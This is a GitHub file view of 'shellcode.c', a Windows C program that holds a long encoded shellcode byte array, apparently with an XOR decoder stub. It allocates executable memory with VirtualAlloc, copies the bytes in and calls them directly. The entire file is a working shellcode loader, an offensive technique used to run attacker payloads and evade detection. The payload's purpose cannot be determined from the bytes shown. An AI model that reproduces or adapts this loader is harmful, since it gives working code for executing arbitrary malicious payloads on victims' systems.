-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathshellcode.c
More file actions
67 lines (62 loc) · 3.4 KB
/
shellcode.c
File metadata and controls
67 lines (62 loc) · 3.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
unsigned char code[] =
"\x48\x31\xc9\x48\x81\xe9\xa7\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xa5\xf6\x35\xbe\xad\x67\x1a\x0d\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x59\xbe\xb6\x5a\x5d\x8f"
"\xda\x0d\xa5\xf6\x74\xef\xec\x37\x48\x5c\xf3\xbe\x04\x6c\xc8"
"\x2f\x91\x5f\xc5\xbe\xbe\xec\xb5\x2f\x91\x5f\x85\xbe\xbe\xcc"
"\xfd\x2f\x15\xba\xef\xbc\x78\x8f\x64\x2f\x2b\xcd\x09\xca\x54"
"\xc2\xaf\x4b\x3a\x4c\x64\x3f\x38\xff\xac\xa6\xf8\xe0\xf7\xb7"
"\x64\xf6\x26\x35\x3a\x86\xe7\xca\x7d\xbf\x7d\xec\x9a\x85\xa5"
"\xf6\x35\xf6\x28\xa7\x6e\x6a\xed\xf7\xe5\xee\x26\x2f\x02\x49"
"\x2e\xb6\x15\xf7\xac\xb7\xf9\x5b\xed\x09\xfc\xff\x26\x53\x92"
"\x45\xa4\x20\x78\x8f\x64\x2f\x2b\xcd\x09\xb7\xf4\x77\xa0\x26"
"\x1b\xcc\x9d\x16\x40\x4f\xe1\x64\x56\x29\xad\xb3\x0c\x6f\xd8"
"\xbf\x42\x49\x2e\xb6\x11\xf7\xac\xb7\x7c\x4c\x2e\xfa\x7d\xfa"
"\x26\x27\x06\x44\xa4\x26\x74\x35\xa9\xef\x52\x0c\x75\xb7\x6d"
"\xff\xf5\x39\x43\x57\xe4\xae\x74\xe7\xec\x3d\x52\x8e\x49\xd6"
"\x74\xec\x52\x87\x42\x4c\xfc\xac\x7d\x35\xbf\x8e\x4d\xf2\x5a"
"\x09\x68\xf6\x17\x66\x1a\x0d\xa5\xf6\x35\xbe\xad\x2f\x97\x80"
"\xa4\xf7\x35\xbe\xec\xdd\x2b\x86\xca\x71\xca\x6b\x16\x97\xaf"
"\xaf\xf3\xb7\x8f\x18\x38\xda\x87\xf2\x70\xbe\xb6\x7a\x85\x5b"
"\x1c\x71\xaf\x76\xce\x5e\xd8\x62\xa1\x4a\xb6\x84\x5a\xd4\xad"
"\x3e\x5b\x84\x7f\x09\xe0\xce\xc2\x10\x7f\x7f\xd6\x9e\x50\xd2"
"\xc1\x49\x7f\x75\xc0\xd6\x7b\xdb\xda\x4a\x53\x79\xc0\x9b\x15"
"\x93\xfd\x06\x6e\x65\x85\xd1\x56\x84\xf1\x40\x3a\x20\xeb\x97"
"\x58\xdb\x8d\x40\x6a\x68\xd7\x85\x5c\xcd\xd9\x02\x74\x6e\xc0"
"\xd8\x41\xc6\xd9\x40\x3a\x20\xe3\x99\x47\xdd\xc8\x5c\x3a\x4c"
"\xc1\x92\x18\xfd\xc2\x09\x6e\x68\xcb\x82\x15\x93\xfd\x06\x6e"
"\x65\x85\xd1\x56\x84\xf1\x17\x7f\x7f\xd6\x9f\x46\xca\xc8\x09"
"\x79\x68\x8b\x82\x4d\xca\x8a\x47\x37\x5b\xc4\x9a\x40\xdb\x8d"
"\x40\x69\x79\xc4\x84\x41\x9e\xce\x5d\x46\x7d\xc0\x84\x46\xd7"
"\xde\x13\x7f\x63\xc6\x93\x1b\xdb\xd5\x02\x3d\x36\x85\xb7\x51"
"\xda\x80\x24\x75\x63\xd1\x93\x5b\xca\x8d\x4a\x4a\x6c\xd1\x9e"
"\x15\x99\xee\x5d\x46\x7d\xc0\x84\x46\xd7\xde\x13\x7f\x63\xc6"
"\x93\x1b\xca\xd5\x13\x3d\x2d\x88\xa0\x54\xd2\xd8\x02\x3a\x2a"
"\xd6\x82\x54\xcc\xd9\x47\x74\x62\xd1\x93\x45\xdf\xc9\x49\x7f"
"\x75\xc0\xd6\x10\x8f\x8a\x5c\x3a\x5f\xc0\x98\x54\xd3\xc8\x4a"
"\x53\x79\xc0\x9b\x15\x93\xfd\x06\x6e\x65\x85\xd1\x56\x84\xf1"
"\x17\x7f\x7f\xd6\x9f\x46\xca\xc8\x09\x79\x68\x8b\x82\x4d\xca"
"\x8a\x47\x37\x43\xc0\x81\x7b\xdf\xc0\x02\x3a\x2a\xd5\x93\x47"
"\xcd\xc4\x14\x6e\x68\xcb\x95\x50\x90\xce\x0a\x7e\x2a\x9e\xd6"
"\x7b\xdb\xda\x4a\x4a\x5e\xe1\x84\x5c\xc8\xc8\x47\x37\x43\xc4"
"\x9b\x50\x9e\xe5\x2c\x59\x5f\x85\xdb\x65\xed\xfd\x15\x75\x7b"
"\xcc\x92\x50\xcc\x8d\x35\x7f\x6a\xcc\x85\x41\xcc\xd4\x47\x37"
"\x5f\xca\x99\x41\x9e\xe5\x2c\x5f\x54\xfa\xb5\x79\xff\xfe\x34"
"\x5f\x5e\xfa\xa4\x7a\xf1\xf9\x5c\x3a\x43\xc0\x81\x18\xf7\xd9"
"\x02\x77\x2d\x88\xa6\x54\xca\xc5\x47\x3d\x45\xee\xb5\x67\x84"
"\xf1\x13\x62\x79\xc3\x9f\x59\xdb\xf1\x14\x72\x68\xc9\x9a\x69"
"\xd1\xdd\x02\x74\x2a\x85\xdb\x7b\xdf\xc0\x02\x3a\x2a\xc6\x99"
"\x58\xd3\xcc\x09\x7e\x2a\x85\xdb\x63\xdf\xc1\x12\x7f\x2d\x82"
"\x95\x0f\xe2\xdd\x02\x68\x7e\xcc\x85\x41\xdb\xc3\x04\x7f\x23"
"\xc6\x9b\x51\x9e\x88\x56\x3d\x2d\x88\xb0\x5a\xcc\xce\x02\x21"
"\x0d";
int main()
{
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, code, sizeof(code));
((void(*)())exec)();
return 0;
}